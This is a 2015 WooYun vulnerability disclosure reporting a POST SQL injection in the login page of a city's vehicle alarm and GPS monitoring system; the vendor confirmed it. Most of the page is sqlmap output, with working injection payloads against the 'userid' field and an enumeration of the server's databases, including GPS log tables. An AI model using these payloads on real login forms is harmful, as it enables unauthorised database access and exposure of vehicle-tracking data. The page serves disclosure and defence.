当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101009

漏洞标题:某市敏感单位车辆报警监控系统SQL注入二

相关厂商:公安部一所

漏洞作者: YY-2012

提交时间:2015-03-13 14:38

修复时间:2015-04-27 14:40

公开时间:2015-04-27 14:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-13: 细节已通知厂商并且等待厂商处理中
2015-03-13: 厂商已经确认,细节仅向厂商公开
2015-03-23: 细节向核心白帽子及相关领域专家公开
2015-04-02: 细节向普通白帽子公开
2015-04-12: 细节向实习白帽子公开
2015-04-27: 细节向公众公开

简要描述:

rt

详细说明:

与上一个ip不同

mask 区域 
*****^心GPS车辆^*****
1.http://**.**.**/


存在post注入
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 'admin'' 之前有未闭合的引号。
/logina.asp,行 15

漏洞证明:


sqlmap identified the following injection points with a total of 61 HTTP(s) requests:
---
Parameter: userid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: userid=admin' AND 7428=7428 AND 'BTOH'='BTOH&password=asd&I1.x=67&I1.y=12
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: userid=admin' AND 3479=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (3479=3479) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113))) AND 'DEYu'='DEYu&password=asd&I1.x=67&I1.y=12
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: userid=admin';WAITFOR DELAY '0:0:5'--&password=asd&I1.x=67&I1.y=12
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: userid=admin' WAITFOR DELAY '0:0:5'--&password=asd&I1.x=67&I1.y=12
    Type: UNION query
    Title: Generic UNION query (NULL) - 18 columns
    Payload: userid=-3410' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(88)+CHAR(111)+CHAR(81)+CHAR(107)+CHAR(77)+CHAR(118)+CHAR(65)+CHAR(74)+CHAR(114)+CHAR(88)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113),NULL,NULL,NULL-- &password=asd&I1.x=67&I1.y=12
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: userid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: userid=admin' AND 7428=7428 AND 'BTOH'='BTOH&password=asd&I1.x=67&I1.y=12
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: userid=admin' AND 3479=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (3479=3479) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113))) AND 'DEYu'='DEYu&password=asd&I1.x=67&I1.y=12
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: userid=admin';WAITFOR DELAY '0:0:5'--&password=asd&I1.x=67&I1.y=12
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: userid=admin' WAITFOR DELAY '0:0:5'--&password=asd&I1.x=67&I1.y=12
    Type: UNION query
    Title: Generic UNION query (NULL) - 18 columns
    Payload: userid=-3410' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(88)+CHAR(111)+CHAR(81)+CHAR(107)+CHAR(77)+CHAR(118)+CHAR(65)+CHAR(74)+CHAR(114)+CHAR(88)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113),NULL,NULL,NULL-- &password=asd&I1.x=67&I1.y=12
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
Database: tempdb
[2 tables]
+--------------------------------------------+
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: msdb
[82 tables]
+--------------------------------------------+
| RTblClassDefs                              |
| RTblDBMProps                               |
| RTblDBXProps                               |
| RTblDTMProps                               |
| RTblDTSProps                               |
| RTblDatabaseVersion                        |
| RTblEQMProps                               |
| RTblEnumerationDef                         |
| RTblEnumerationValueDef                    |
| RTblGENProps                               |
| RTblIfaceDefs                              |
| RTblIfaceHier                              |
| RTblIfaceMem                               |
| RTblMDSProps                               |
| RTblNamedObj                               |
| RTblOLPProps                               |
| RTblParameterDef                           |
| RTblPropDefs                               |
| RTblProps                                  |
| RTblRelColDefs                             |
| RTblRelshipDefs                            |
| RTblRelshipProps                           |
| RTblRelships                               |
| RTblSIMProps                               |
| RTblScriptDefs                             |
| RTblSites                                  |
| RTblSumInfo                                |
| RTblTFMProps                               |
| RTblTypeInfo                               |
| RTblTypeLibs                               |
| RTblUMLProps                               |
| RTblUMXProps                               |
| RTblVersionAdminInfo                       |
| RTblVersions                               |
| RTblWorkspaceItems                         |
| backupfile                                 |
| backupmediafamily                          |
| backupmediaset                             |
| backupset                                  |
| log_shipping_databases                     |
| log_shipping_monitor                       |
| log_shipping_plan_databases                |
| log_shipping_plan_history                  |
| log_shipping_plans                         |
| log_shipping_primaries                     |
| log_shipping_secondaries                   |
| logmarkhistory                             |
| mswebtasks                                 |
| restorefilegroup                           |
| restorefilegroup                           |
| restorehistory                             |
| sqlagent_info                              |
| sysalerts                                  |
| syscachedcredentials                       |
| syscategories                              |
| sysconstraints                             |
| sysdbmaintplan_databases                   |
| sysdbmaintplan_history                     |
| sysdbmaintplan_jobs                        |
| sysdbmaintplans                            |
| sysdownloadlist                            |
| sysdtscategories                           |
| sysdtspackagelog                           |
| sysdtspackages                             |
| sysdtssteplog                              |
| sysdtstasklog                              |
| sysjobhistory                              |
| sysjobs_view                               |
| sysjobs_view                               |
| sysjobschedules                            |
| sysjobservers                              |
| sysjobsteps                                |
| sysnotifications                           |
| sysoperators                               |
| syssegments                                |
| systargetservergroupmembers                |
| systargetservergroups                      |
| systargetservers_view                      |
| systargetservers_view                      |
| systaskids                                 |
| systasks_view                              |
| systasks_view                              |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| authors                                    |
| discounts                                  |
| employee                                   |
| jobs                                       |
| pub_info                                   |
| publishers                                 |
| roysched                                   |
| sales                                      |
| stores                                     |
| sysconstraints                             |
| syssegments                                |
| titleauthor                                |
| titles                                     |
| titleview                                  |
+--------------------------------------------+
Database: gpslog
[72 tables]
+--------------------------------------------+
| ALARMMSG200904                             |
| ALARMMSG200905                             |
| ALARMMSG200906                             |
| ALARMMSG200907                             |
| ALARMMSG201210                             |
| ALARMMSG201211                             |
| ALARMMSG201212                             |
| ALARMMSG201301                             |
| ALARMMSG201302                             |
| ALARMMSG201303                             |
| ALARMMSG201304                             |
| ALARMMSG201305                             |
| ALARMMSG201306                             |
| ALARMMSG201307                             |
| ALARMMSG201308                             |
| ALARMMSG201309                             |
| ALARMMSG201310                             |
| ALARMMSG201311                             |
| ALARMMSG201312                             |
| ALARMMSG201401                             |
| ALARMMSG201402                             |
| ALARMMSG201403                             |
| ALARMMSG201405                             |
| ALARMMSG201406                             |
| ALARMMSG201407                             |
| ALARMMSG201408                             |
| ALARMMSG201409                             |
| ALARMMSG201410                             |
| ALARMMSG201411                             |
| ALARMMSG201412                             |
| ALARMMSG201501                             |
| ALARMMSG201502                             |
| ALARMMSG201503                             |
| ALARMMSG201504                             |
| HISTORYINFO200904                          |
| HISTORYINFO200905                          |
| HISTORYINFO200906                          |
| HISTORYINFO200907                          |
| HISTORYINFO201210                          |
| HISTORYINFO201211                          |
| HISTORYINFO201212                          |
| HISTORYINFO201301                          |
| HISTORYINFO201302                          |
| HISTORYINFO201303                          |
| HISTORYINFO201304                          |
| HISTORYINFO201305                          |
| HISTORYINFO201306                          |
| HISTORYINFO201307                          |
| HISTORYINFO201308                          |
| HISTORYINFO201309                          |
| HISTORYINFO201310                          |
| HISTORYINFO201311                          |
| HISTORYINFO201312                          |
| HISTORYINFO201401                          |
| HISTORYINFO201402                          |
| HISTORYINFO201403                          |
| HISTORYINFO201405                          |
| HISTORYINFO201406                          |
| HISTORYINFO201407                          |
| HISTORYINFO201408                          |
| HISTORYINFO201409                          |
| HISTORYINFO201410                          |
| HISTORYINFO201411                          |
| HISTORYINFO201412                          |
| HISTORYINFO201501                          |
| HISTORYINFO201502                          |
| HISTORYINFO201503                          |
| HISTORYINFO201504                          |
| dtproperties                               |
| mt_info                                    |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS       |
| INFORMATION_SCHEMA.COLUMNS                 |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES       |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE  |
| INFORMATION_SCHEMA.DOMAINS                 |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS      |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE        |
| INFORMATION_SCHEMA.PARAMETERS              |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES                |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS         |
| INFORMATION_SCHEMA.SCHEMATA                |
| INFORMATION_SCHEMA.TABLES                  |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES        |
| INFORMATION_SCHEMA.VIEWS                   |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE       |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE        |
| MSreplication_options                      |
| spt_datatype_info_ext                      |
| spt_datatype_info_ext                      |
| spt_fallback_db                            |
| spt_fallback_dev                           |
| spt_fallback_usg                           |
| spt_monitor                                |
| spt_provider_types                         |
| spt_server_info                            |
| spt_values                                 |
| sysconstraints                             |
| syslogins                                  |
| sysoledbusers                              |
| sysopentapes                               |
| sysremotelogins                            |
| syssegments                                |
+--------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------+
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories                                 |
| CustomerCustomerDemo                       |
| CustomerDemographics                       |
| Customers                                  |
| EmployeeTerritories                        |
| Employees                                  |
| Invoices                                   |
| Region                                     |
| Shippers                                   |
| Suppliers                                  |
| Territories                                |
| Alphabetical list of products              |
| Category Sales for 1997                    |
| Current Product List                       |
| Customer and Suppliers by City             |
| Order Details Extended                     |
| Order Details Extended                     |
| Order Subtotals                            |
| Orders Qry                                 |
| Orders Qry                                 |
| Product Sales for 1997                     |
| Products Above Average Price               |
| Products Above Average Price               |
| Products by Category                       |
| Quarterly Orders                           |
| Sales Totals by Amount                     |
| Sales by Category                          |
| Summary of Sales by Quarter                |
| Summary of Sales by Year                   |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-13 15:30

厂商回复:

验证确认存在所描述的问题,已通知其修复。

最新状态:

暂无